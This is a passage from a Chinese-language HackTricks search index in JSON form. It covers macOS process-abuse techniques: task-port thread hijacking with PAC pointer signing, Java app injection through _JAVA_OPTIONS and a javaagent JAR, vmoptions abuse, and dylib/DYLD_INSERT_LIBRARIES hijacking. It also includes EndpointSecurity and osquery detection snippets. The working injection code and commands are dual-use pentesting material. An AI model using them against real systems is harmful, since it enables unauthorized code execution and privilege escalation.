Check » macOS xpc_connection_get_audit_token Attack » 发现问题","id":"2472","title":"发现问题"},"2473":{"body":"报告问题 :向 Apple 提交了一份报告,详细说明了在 smd 中发现的一般和特定问题。 Apple 的回应 :Apple 通过将 xpc_connection_get_audit_token 替换为 xpc_dictionary_get_audit_token 解决了 smd 中的问题。 修复的性质 :xpc_dictionary_get_audit_token 函数被认为是安全的,因为它直接从与接收的 XPC 消息相关的 mach 消息中检索审计令牌。然而,它不是公共 API 的一部分,类似于 xpc_connection_get_audit_token。 缺乏更广泛的修复 :尚不清楚为什么 Apple 没有实施更全面的修复,例如丢弃与连接的保存审计令牌不一致的消息。某些场景(例如 setuid 使用)中合法审计令牌更改的可能性可能是一个因素。 当前状态 :该问题在 iOS 17 和 macOS 14 中仍然存在,给那些寻求识别和理解它的人带来了挑战。 tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS IPC - Inter Process Communication » macOS XPC » macOS XPC Connecting Process Check » macOS xpc_connection_get_audit_token Attack » 修复","id":"2473","title":"修复"},"2474":{"body":"Reading time: 11 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 
通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS IPC - Inter Process Communication » macOS Thread Injection via Task port » macOS 通过任务端口进行线程注入","id":"2474","title":"macOS 通过任务端口进行线程注入"},"2475":{"body":"https://github.com/bazad/threadexec https://gist.github.com/knightsc/bd6dfeccb02b77eb6409db5601dcef36","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS IPC - Inter Process Communication » macOS Thread Injection via Task port » 代码","id":"2475","title":"代码"},"2476":{"body":"最初,task_threads() 函数在任务端口上被调用,以从远程任务获取线程列表。选择一个线程进行劫持。这种方法与传统的代码注入方法不同,因为由于阻止 thread_create_running() 的缓解措施,创建新的远程线程是被禁止的。 为了控制线程,调用 thread_suspend(),暂停其执行。 在远程线程上允许的唯一操作是 停止 和 启动 线程,以及 检索 / 修改 其寄存器值。通过将寄存器 x0 到 x7 设置为 参数 ,配置 pc 以指向所需函数,并恢复线程,从而发起远程函数调用。确保线程在返回后不崩溃需要检测返回。 一种策略是使用 thread_set_exception_ports() 为远程线程注册 异常处理程序 ,在函数调用之前将 lr 寄存器设置为无效地址。这会在函数执行后触发异常,向异常端口发送消息,使得可以检查线程的状态以恢复返回值。或者,借鉴 Ian Beer 的 triple_fetch 漏洞,将 lr 设置为无限循环;然后持续监控线程的寄存器,直到 pc 指向该指令。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS IPC - Inter Process Communication » macOS Thread Injection via Task port » 1. 线程劫持","id":"2476","title":"1. 
线程劫持"},"2477":{"body":"接下来的阶段涉及建立 Mach 端口,以促进与远程线程的通信。这些端口在任务之间传输任意的发送/接收权限中起着重要作用。 为了实现双向通信,创建两个 Mach 接收权限:一个在本地任务中,另一个在远程任务中。随后,将每个端口的发送权限转移到对应的任务,从而实现消息交换。 关注本地端口,接收权限由本地任务持有。该端口通过 mach_port_allocate() 创建。挑战在于将该端口的发送权限转移到远程任务中。 一种策略是利用 thread_set_special_port() 将本地端口的发送权限放置在远程线程的 THREAD_KERNEL_PORT 中。然后,指示远程线程调用 mach_thread_self() 以检索发送权限。 对于远程端口,过程基本上是反向的。指示远程线程通过 mach_reply_port() 生成一个 Mach 端口(因为 mach_port_allocate() 不适合由于其返回机制)。在端口创建后,在远程线程中调用 mach_port_insert_right() 以建立发送权限。然后,该权限通过 thread_set_special_port() 存储在内核中。在本地任务中,使用 thread_get_special_port() 在远程线程上获取对远程任务中新分配的 Mach 端口的发送权限。 完成这些步骤后,建立了 Mach 端口,为双向通信奠定了基础。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS IPC - Inter Process Communication » macOS Thread Injection via Task port » 2. 用于通信的 Mach 端口","id":"2477","title":"2. 用于通信的 Mach 端口"},"2478":{"body":"在本节中,重点是利用执行原语建立基本的内存读/写原语。这些初步步骤对于获得对远程进程的更多控制至关重要,尽管此阶段的原语不会发挥太多作用。很快,它们将升级为更高级的版本。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS IPC - Inter Process Communication » macOS Thread Injection via Task port » 3. 基本内存读/写原语","id":"2478","title":"3. 
基本内存读/写原语"},"2479":{"body":"目标是使用特定函数执行内存读写。对于 读取内存 : c uint64_t read_func(uint64_t *address) {\\nreturn *address;\\n} 对于 写入内存 : c void write_func(uint64_t *address, uint64_t value) {\\n*address = value;\\n} 这些函数对应以下汇编: _read_func:\\nldr x0, [x0]\\nret\\n_write_func:\\nstr x1, [x0]\\nret","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS IPC - Inter Process Communication » macOS Thread Injection via Task port » 使用执行原语进行内存读写","id":"2479","title":"使用执行原语进行内存读写"},"248":{"body":"持续检查 Registration Request 中是否包含明文 SUPI/IMSI;阻断违规设备/USIMs。 拒绝 EEA0/EIA0,除非在严格限定的紧急程序中允许;至少要求 EEA2/EIA2。 检测流氓或配置错误的基础设施:未授权的 gNB/AMF、意外的 N2 对端。 对导致 null 算法或频繁重放 InitialUEMessage 的 NAS 安全模式发出告警。","breadcrumbs":"Pentesting Network » Telecom Network Exploitation » 9.5 Defensive checklist","id":"248","title":"9.5 Defensive checklist"},"2480":{"body":"对常见库的扫描揭示了这些操作的合适候选者: 读取内存 — property_getName() (libobjc): c const char *property_getName(objc_property_t prop) {\\nreturn prop->name;\\n} 写入内存 — _xpc_int64_set_value() (libxpc): c __xpc_int64_set_value:\\nstr x1, [x0, #0x18]\\nret 要在任意地址执行 64 位写入: c _xpc_int64_set_value(address - 0x18, value); 建立这些原语后,创建共享内存的舞台已经设定,这标志着在控制远程进程方面的重大进展。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS IPC - Inter Process Communication » macOS Thread Injection via Task port » 识别合适的函数","id":"2480","title":"识别合适的函数"},"2481":{"body":"目标是在本地和远程任务之间建立共享内存,简化数据传输并促进带有多个参数的函数调用。该方法利用 libxpc 及其 OS_xpc_shmem 对象类型,该类型建立在 Mach 内存条目之上。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS IPC - Inter Process Communication » macOS Thread Injection via Task port » 4. 共享内存设置","id":"2481","title":"4. 
共享内存设置"},"2482":{"body":"内存分配 使用 mach_vm_allocate() 分配共享内存。 使用 xpc_shmem_create() 为分配的区域创建 OS_xpc_shmem 对象。 在远程进程中创建共享内存 在远程进程中为 OS_xpc_shmem 对象分配内存(remote_malloc)。 复制本地模板对象;仍需修复嵌入的 Mach 发送权限,偏移量为 0x18。 修正 Mach 内存条目 使用 thread_set_special_port() 插入发送权限,并用远程条目的名称覆盖 0x18 字段。 最终化 验证远程对象并通过远程调用 xpc_shmem_remote() 进行映射。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS IPC - Inter Process Communication » macOS Thread Injection via Task port » 进程概述","id":"2482","title":"进程概述"},"2483":{"body":"一旦可以进行任意执行和共享内存后通道,您就有效地拥有了目标进程: 任意内存读/写 — 在本地和共享区域之间使用 memcpy()。 带有 > 8 个参数的函数调用 — 按照 arm64 调用约定将额外参数放在栈上。 Mach 端口传输 — 通过已建立的端口在 Mach 消息中传递权限。 文件描述符传输 — 利用文件端口(见 triple_fetch )。 所有这些都封装在 threadexec 库中,以便于重用。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS IPC - Inter Process Communication » macOS Thread Injection via Task port » 5. 实现完全控制","id":"2483","title":"5. 实现完全控制"},"2484":{"body":"在 Apple Silicon 设备(arm64e)上, 指针认证码 (PAC) 保护所有返回地址和许多函数指针。线程劫持技术 重用现有代码 仍然有效,因为 lr/pc 中的原始值已经携带有效的 PAC 签名。当您尝试跳转到攻击者控制的内存时,会出现问题: 在目标内部分配可执行内存(远程 mach_vm_allocate + mprotect(PROT_EXEC))。 复制您的有效载荷。 在 远程 进程中对指针进行签名: c uint64_t ptr = (uint64_t)payload;\\nptr = ptrauth_sign_unauthenticated((void*)ptr, ptrauth_key_asia, 0); 在劫持的线程状态中设置 pc = ptr。 或者,通过链接现有的 gadgets/functions(传统 ROP)来保持 PAC 兼容。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS IPC - Inter Process Communication » macOS Thread Injection via Task port » 6. Apple Silicon (arm64e) 的细微差别","id":"2484","title":"6. Apple Silicon (arm64e) 的细微差别"},"2485":{"body":"EndpointSecurity (ES) 框架暴露了内核事件,允许防御者观察或阻止线程注入尝试: ES_EVENT_TYPE_AUTH_GET_TASK – 当一个进程请求另一个任务的端口时触发(例如 task_for_pid())。 ES_EVENT_TYPE_NOTIFY_REMOTE_THREAD_CREATE – 每当在 不同 任务中创建线程时发出。 ES_EVENT_TYPE_NOTIFY_THREAD_SET_STATE(在 macOS 14 Sonoma 中添加)– 表示对现有线程的寄存器操作。 最小的 Swift 客户端,打印远程线程事件: swift import EndpointSecurity let client = try! 
ESClient(subscriptions: [.notifyRemoteThreadCreate]) {\\n(_, msg) in\\nif let evt = msg.remoteThreadCreate {\\nprint(\\"[ALERT] remote thread in pid \\\\(evt.target.pid) by pid \\\\(evt.thread.pid)\\")\\n}\\n}\\nRunLoop.main.run() 使用 osquery ≥ 5.8 查询: sql SELECT target_pid, source_pid, target_path\\nFROM es_process_events\\nWHERE event_type = \'REMOTE_THREAD_CREATE\';","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS IPC - Inter Process Communication » macOS Thread Injection via Task port » 7. 使用 EndpointSecurity 进行检测和加固","id":"2485","title":"7. 使用 EndpointSecurity 进行检测和加固"},"2486":{"body":"在没有 com.apple.security.get-task-allow 权限的情况下分发您的应用程序可以防止非根用户攻击者获取其任务端口。系统完整性保护(SIP)仍然阻止访问许多 Apple 二进制文件,但第三方软件必须明确选择退出。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS IPC - Inter Process Communication » macOS Thread Injection via Task port » 加固运行时考虑","id":"2486","title":"加固运行时考虑"},"2487":{"body":"工具 年份 备注 task_vaccine 2023 演示在 Ventura/Sonoma 上进行 PAC 感知线程劫持的紧凑 PoC remote_thread_es 2024 被多个 EDR 供应商使用的 EndpointSecurity 辅助工具,用于显示 REMOTE_THREAD_CREATE 事件 阅读这些项目的源代码有助于理解在 macOS 13/14 中引入的 API 更改,并保持在 Intel ↔ Apple Silicon 之间的兼容性。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS IPC - Inter Process Communication » macOS Thread Injection via Task port » 8. 最近的公共工具(2023-2025)","id":"2487","title":"8. 最近的公共工具(2023-2025)"},"2488":{"body":"https://bazad.github.io/2018/10/bypassing-platform-binary-task-threads/ https://github.com/rodionovd/task_vaccine https://developer.apple.com/documentation/endpointsecurity/es_event_type_notify_remote_thread_create tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 
通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS IPC - Inter Process Communication » macOS Thread Injection via Task port » 参考文献","id":"2488","title":"参考文献"},"2489":{"body":"Reading time: 6 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS Java Applications Injection » macOS Java 应用程序注入","id":"2489","title":"macOS Java 应用程序注入"},"249":{"body":"除 SGSN/GGSN 之外的任何设备建立 Create PDP Context Requests 。 来自内部 IP 的非标准端口(53、80、443)接收 SSH 握手 。 频繁的 Echo Requests 而没有相应的 Echo Responses – 可能表示 GTPDoor 信标。 大量带有大且非零 identifier/sequence 字段的 ICMP echo-reply 流量 。 5G: InitialUEMessage 携带的 NAS Registration Requests 从相同端点重复出现 (重放信号)。 5G: NAS Security Mode 在非紧急场景协商 EEA0/EIA0 。","breadcrumbs":"Pentesting Network » Telecom Network Exploitation » Detection Ideas","id":"249","title":"Detection Ideas"},"2490":{"body":"查找安装在系统中的 Java 应用程序。注意到 Info.plist 中的 Java 应用程序将包含一些包含字符串 java. 
的 Java 参数,因此您可以搜索该字符串: bash # Search only in /Applications folder\\nsudo find /Applications -name \'Info.plist\' -exec grep -l \\"java\\\\.\\" {} \\\\; 2>/dev/null # Full search\\nsudo find / -name \'Info.plist\' -exec grep -l \\"java\\\\.\\" {} \\\\; 2>/dev/null","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS Java Applications Injection » 枚举","id":"2490","title":"枚举"},"2491":{"body":"环境变量 _JAVA_OPTIONS 可用于在执行编译的 Java 应用程序时注入任意 Java 参数: bash # Write your payload in a script called /tmp/payload.sh\\nexport _JAVA_OPTIONS=\'-Xms2m -Xmx5m -XX:OnOutOfMemoryError=\\"/tmp/payload.sh\\"\'\\n\\"/Applications/Burp Suite Professional.app/Contents/MacOS/JavaApplicationStub\\" 要将其作为新进程而不是当前终端的子进程执行,可以使用: objectivec #import \\n// clang -fobjc-arc -framework Foundation invoker.m -o invoker int main(int argc, const char * argv[]) {\\n@autoreleasepool {\\n// Specify the file path and content\\nNSString *filePath = @\\"/tmp/payload.sh\\";\\nNSString *content = @\\"#!/bin/bash\\\\n/Applications/iTerm.app/Contents/MacOS/iTerm2\\"; NSError *error = nil; // Write content to the file\\nBOOL success = [content writeToFile:filePath\\natomically:YES\\nencoding:NSUTF8StringEncoding\\nerror:&error]; if (!success) {\\nNSLog(@\\"Error writing file at %@\\\\n%@\\", filePath, [error localizedDescription]);\\nreturn 1;\\n} NSLog(@\\"File written successfully to %@\\", filePath); // Create a new task\\nNSTask *task = [[NSTask alloc] init]; /// Set the task\'s launch path to use the \'open\' command\\n[task setLaunchPath:@\\"/usr/bin/open\\"]; // Arguments for the \'open\' command, specifying the path to Android Studio\\n[task setArguments:@[@\\"/Applications/Android Studio.app\\"]]; // Define custom environment variables\\nNSDictionary *customEnvironment = @{\\n@\\"_JAVA_OPTIONS\\": @\\"-Xms2m -Xmx5m -XX:OnOutOfMemoryError=/tmp/payload.sh\\"\\n}; // Get the current environment and merge it with custom variables\\nNSMutableDictionary *environment = 
[NSMutableDictionary dictionaryWithDictionary:[[NSProcessInfo processInfo] environment]];\\n[environment addEntriesFromDictionary:customEnvironment]; // Set the task\'s environment\\n[task setEnvironment:environment]; // Launch the task\\n[task launch];\\n}\\nreturn 0;\\n} 然而,这会在执行的应用程序上触发错误,另一种更隐蔽的方法是创建一个 Java 代理并使用: bash export _JAVA_OPTIONS=\'-javaagent:/tmp/Agent.jar\'\\n\\"/Applications/Burp Suite Professional.app/Contents/MacOS/JavaApplicationStub\\" # Or open --env \\"_JAVA_OPTIONS=\'-javaagent:/tmp/Agent.jar\'\\" -a \\"Burp Suite Professional\\" caution 使用与应用程序 不同的 Java 版本 创建代理可能会导致代理和应用程序的执行崩溃 代理可以是: Agent.java import java.io.*;\\nimport java.lang.instrument.*; public class Agent {\\npublic static void premain(String args, Instrumentation inst) {\\ntry {\\nString[] commands = new String[] { \\"/usr/bin/open\\", \\"-a\\", \\"Calculator\\" };\\nRuntime.getRuntime().exec(commands);\\n}\\ncatch (Exception err) {\\nerr.printStackTrace();\\n}\\n}\\n} 要编译代理,请运行: bash javac Agent.java # Create Agent.class\\njar cvfm Agent.jar manifest.txt Agent.class # Create Agent.jar 使用 manifest.txt: Premain-Class: Agent\\nAgent-Class: Agent\\nCan-Redefine-Classes: true\\nCan-Retransform-Classes: true 然后导出环境变量并运行 Java 应用程序,如下所示: bash export _JAVA_OPTIONS=\'-javaagent:/tmp/j/Agent.jar\'\\n\\"/Applications/Burp Suite Professional.app/Contents/MacOS/JavaApplicationStub\\" # Or open --env \\"_JAVA_OPTIONS=\'-javaagent:/tmp/Agent.jar\'\\" -a \\"Burp Suite Professional\\"","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS Java Applications Injection » _JAVA_OPTIONS","id":"2491","title":"_JAVA_OPTIONS"},"2492":{"body":"此文件支持在执行 Java 时指定 Java 参数 。您可以使用之前的一些技巧来更改 Java 参数并 使进程执行任意命令 。 此外,此文件还可以通过 include 目录 包含其他文件 ,因此您也可以更改包含的文件。 更重要的是,一些 Java 应用程序将 加载多个 vmoptions 文件。 一些应用程序,如 Android Studio,会在其 输出中指示它们正在查找 这些文件的位置,例如: bash /Applications/Android\\\\ Studio.app/Contents/MacOS/studio 2>&1 | grep vmoptions 2023-12-13 19:53:23.920 studio[74913:581359] 
fullFileName is: /Applications/Android Studio.app/Contents/bin/studio.vmoptions\\n2023-12-13 19:53:23.920 studio[74913:581359] fullFileName exists: /Applications/Android Studio.app/Contents/bin/studio.vmoptions\\n2023-12-13 19:53:23.920 studio[74913:581359] parseVMOptions: /Applications/Android Studio.app/Contents/bin/studio.vmoptions\\n2023-12-13 19:53:23.921 studio[74913:581359] parseVMOptions: /Applications/Android Studio.app.vmoptions\\n2023-12-13 19:53:23.922 studio[74913:581359] parseVMOptions: /Users/carlospolop/Library/Application Support/Google/AndroidStudio2022.3/studio.vmoptions\\n2023-12-13 19:53:23.923 studio[74913:581359] parseVMOptions: platform=20 user=1 file=/Users/carlospolop/Library/Application Support/Google/AndroidStudio2022.3/studio.vmoptions 如果他们没有,你可以轻松检查: bash # Monitor\\nsudo eslogger lookup | grep vmoption # Give FDA to the Terminal # Launch the Java app\\n/Applications/Android\\\\ Studio.app/Contents/MacOS/studio 注意到在这个例子中,Android Studio 正在尝试加载文件 /Applications/Android Studio.app.vmoptions ,这是任何来自 admin 组的用户都有写入权限的地方。 tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS Java Applications Injection » vmoptions 文件","id":"2492","title":"vmoptions 文件"},"2493":{"body":"Reading time: 18 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 
通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。 caution dyld 的代码是开源的 ,可以在 https://opensource.apple.com/source/dyld/ 找到,并且可以使用 URL 如 https://opensource.apple.com/tarballs/dyld/dyld-852.2.tar.gz 下载为 tar。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS Library Injection » macOS Library Injection","id":"2493","title":"macOS Library Injection"},"2494":{"body":"查看 Dyld 如何在二进制文件中加载库: macOS Dyld Process","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS Library Injection » Dyld 进程","id":"2494","title":"Dyld 进程"},"2495":{"body":"这类似于 Linux 上的 LD_PRELOAD 。它允许指示即将运行的进程从路径加载特定库(如果环境变量已启用)。 此技术也可以 作为 ASEP 技术使用 ,因为每个安装的应用程序都有一个名为 \\"Info.plist\\" 的 plist,允许使用名为 LSEnvironmental 的键 分配环境变量 。 tip 自 2012 年以来, Apple 大幅减少了 DYLD_INSERT_LIBRARIES 的权限。 查看代码并 检查 src/dyld.cpp 。在函数 pruneEnvironmentVariables 中,您可以看到 DYLD_* 变量被移除。 在函数 processRestricted 中,设置了限制的原因。检查该代码,您可以看到原因包括: 二进制文件是 setuid/setgid macho 二进制文件中存在 __RESTRICT/__restrict 部分。 软件具有权限(强化运行时),但没有 com.apple.security.cs.allow-dyld-environment-variables 权限。 使用以下命令检查二进制文件的 权限 :codesign -dv --entitlements :- 在更新版本中,您可以在函数 configureProcessRestrictions 的第二部分找到此逻辑。然而,在较新版本中执行的是函数的 开始检查 (您可以删除与 iOS 或模拟相关的 if,因为这些在 macOS 中不会使用)。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS Library Injection » DYLD_INSERT_LIBRARIES","id":"2495","title":"DYLD_INSERT_LIBRARIES"},"2496":{"body":"即使二进制文件允许使用 DYLD_INSERT_LIBRARIES 环境变量,如果二进制文件检查要加载的库的签名,它也不会加载自定义库。 为了加载自定义库,二进制文件需要具有 以下任一权限 : com.apple.security.cs.disable-library-validation com.apple.private.security.clear-library-validation 或者二进制文件 不应该 具有 强化运行时标志 或 库验证标志 。 您可以使用 codesign --display --verbose 检查二进制文件是否具有 强化运行时 ,检查 CodeDirectory 中的 runtime 标志,如: CodeDirectory v=20500 size=767 flags=0x10000(runtime) hashes=13+7 location=embedded 。 如果库 使用与二进制文件相同的证书签名 ,您也可以加载该库。 找到一个示例,了解如何(滥用)此功能并检查限制: macOS Dyld Hijacking & DYLD_INSERT_LIBRARIES","breadcrumbs":"macOS Security & Privilege Escalation » 
macOS Process Abuse » macOS Library Injection » 库验证","id":"2496","title":"库验证"},"2497":{"body":"caution 请记住, 先前的库验证限制也适用于 执行 Dylib 劫持攻击。 与 Windows 一样,在 MacOS 中,您也可以 劫持 dylibs 使 应用程序 执行 任意 代码 (实际上,从普通用户的角度来看,这可能不可行,因为您可能需要 TCC 权限才能在 .app 包内写入并劫持库)。 然而, MacOS 应用程序 加载 库的方式 比 Windows 更受限制 。这意味着 恶意软件 开发者仍然可以使用此技术进行 隐蔽 ,但能够 滥用此技术以提升权限的可能性要低得多 。 首先, 更常见 的情况是 MacOS 二进制文件指示要加载的库的完整路径 。其次, MacOS 从不在 $PATH 的文件夹中搜索库 。 与此功能相关的 主要 代码部分在 ImageLoader::recursiveLoadLibraries 中,位于 ImageLoader.cpp。 macho 二进制文件可以使用 4 种不同的头部命令 来加载库: LC_LOAD_DYLIB 命令是加载 dylib 的常用命令。 LC_LOAD_WEAK_DYLIB 命令的工作方式与前一个相同,但如果未找到 dylib,执行将继续而不会出现错误。 LC_REEXPORT_DYLIB 命令代理(或重新导出)来自不同库的符号。 LC_LOAD_UPWARD_DYLIB 命令在两个库相互依赖时使用(这称为 向上依赖 )。 然而,有 2 种类型的 dylib 劫持 : 缺失的弱链接库 :这意味着应用程序将尝试加载一个不存在的库,该库配置为 LC_LOAD_WEAK_DYLIB 。然后, 如果攻击者在预期加载的位置放置了一个 dylib 。 链接是“弱”的事实意味着即使未找到库,应用程序仍将继续运行。 与此相关的 代码 在 ImageLoaderMachO::doGetDependentLibraries 函数中,lib->required 仅在 LC_LOAD_WEAK_DYLIB 为 true 时为 false。 在二进制文件中查找弱链接库 (稍后您将看到如何创建劫持库的示例): otool -l | grep LC_LOAD_WEAK_DYLIB -A 5 cmd LC_LOAD_WEAK_DYLIB cmdsize 56 name /var/tmp/lib/libUtl.1.dylib (offset 24) time stamp 2 Wed Jun 21 12:23:31 1969 current version 1.0.0 compatibility version 1.0.0 - **配置为 @rpath**:Mach-O 二进制文件可以具有 **`LC_RPATH`** 和 **`LC_LOAD_DYLIB`** 命令。根据这些命令的 **值**,**库** 将从 **不同目录** 加载。\\n- **`LC_RPATH`** 包含用于通过二进制文件加载库的一些文件夹的路径。\\n- **`LC_LOAD_DYLIB`** 包含要加载的特定库的路径。这些路径可以包含 **`@rpath`**,将被 **`LC_RPATH`** 中的值 **替换**。如果 **`LC_RPATH`** 中有多个路径,将使用所有路径来搜索要加载的库。例如:\\n- 如果 **`LC_LOAD_DYLIB`** 包含 `@rpath/library.dylib`,而 **`LC_RPATH`** 包含 `/application/app.app/Contents/Framework/v1/` 和 `/application/app.app/Contents/Framework/v2/`。这两个文件夹将用于加载 `library.dylib`**。** 如果库在 `[...]/v1/` 中不存在,攻击者可以将其放置在那里以劫持在 `[...]/v2/` 中加载库,因为遵循 **`LC_LOAD_DYLIB`** 中路径的顺序。\\n- **在二进制文件中查找 rpath 路径和库**:`otool -l | grep -E \\"LC_RPATH|LC_LOAD_DYLIB\\" -A 5` > [!NOTE] > **`@executable_path`**:是 **主可执行文件** 所在目录的 **路径**。\\n>\\n> **`@loader_path`**:是 **包含** 加载命令的 **Mach-O 二进制文件** 所在 **目录** 的 **路径**。\\n>\\n> - 
当在可执行文件中使用时,**`@loader_path`** 实际上与 **`@executable_path`** 是 **相同的**。\\n> - 当在 **dylib** 中使用时,**`@loader_path`** 给出 **dylib** 的 **路径**。 滥用此功能以 **提升权限** 的方式是在 **应用程序** 由 **root** 执行时,**查找** 在攻击者具有写权限的某个文件夹中的 **库**。
\\n

tip\\n

一个很好的 **扫描器** 用于查找应用程序中的 **缺失库** 是 [**Dylib Hijack Scanner**](https://objective-see.com/products/dhs.html) 或 [**CLI 版本**](https://github.com/pandazheng/DylibHijack)。\\\\\\n关于此技术的 **技术细节** 的很好的 **报告** 可以在 [**这里**](https://www.virusbulletin.com/virusbulletin/2015/03/dylib-hijacking-os-x) 找到。
**示例** macOS Dyld Hijacking & DYLD_INSERT_LIBRARIES ## Dlopen 劫持
\\n

caution\\n

请记住,**先前的库验证限制也适用于** 执行 Dlopen 劫持攻击。
来自 **`man dlopen`**: - 当路径 **不包含斜杠字符**(即它只是一个叶名称)时,**dlopen() 将进行搜索**。如果 **`$DYLD_LIBRARY_PATH`** 在启动时设置,dyld 将首先 **在该目录中查找**。接下来,如果调用的 mach-o 文件或主可执行文件指定了 **`LC_RPATH`**,则 dyld 将 **在这些** 目录中查找。接下来,如果进程是 **不受限制的**,dyld 将在 **当前工作目录** 中搜索。最后,对于旧二进制文件,dyld 将尝试一些后备方案。如果 **`$DYLD_FALLBACK_LIBRARY_PATH`** 在启动时设置,dyld 将在 **这些目录中搜索**,否则,dyld 将在 **`/usr/local/lib/`** 中查找(如果进程不受限制),然后在 **`/usr/lib/`** 中查找(此信息来自 **`man dlopen`**)。\\n1. `$DYLD_LIBRARY_PATH`\\n2. `LC_RPATH`\\n3. `CWD`(如果不受限制)\\n4. `$DYLD_FALLBACK_LIBRARY_PATH`\\n5. `/usr/local/lib/`(如果不受限制)\\n6. `/usr/lib/`
\\n

caution\\n

如果名称中没有斜杠,则有 2 种方式进行劫持: - 如果任何 **`LC_RPATH`** 是 **可写的**(但签名会被检查,因此您还需要二进制文件不受限制)\\n- 如果二进制文件是 **不受限制的**,那么可以从 CWD 加载某些内容(或滥用上述提到的环境变量之一)
- 当路径 **看起来像框架** 路径(例如 `/stuff/foo.framework/foo`)时,如果 **`$DYLD_FRAMEWORK_PATH`** 在启动时设置,dyld 将首先在该目录中查找 **框架部分路径**(例如 `foo.framework/foo`)。接下来,dyld 将尝试 **按原样使用提供的路径**(对相对路径使用当前工作目录)。最后,对于旧二进制文件,dyld 将尝试一些后备方案。如果 **`$DYLD_FALLBACK_FRAMEWORK_PATH`** 在启动时设置,dyld 将在这些目录中搜索。否则,它将搜索 **`/Library/Frameworks`**(在 macOS 上,如果进程不受限制),然后 **`/System/Library/Frameworks`**。\\n1. `$DYLD_FRAMEWORK_PATH`\\n2. 提供的路径(如果不受限制,则对相对路径使用当前工作目录)\\n3. `$DYLD_FALLBACK_FRAMEWORK_PATH`\\n4. `/Library/Frameworks`(如果不受限制)\\n5. `/System/Library/Frameworks`
\\n

caution\\n

如果是框架路径,劫持的方式将是: - 如果进程是 **不受限制的**,滥用 **来自 CWD 的相对路径** 和上述提到的环境变量(即使文档中没有说明,如果进程受限制,DYLD_* 环境变量也会被移除)
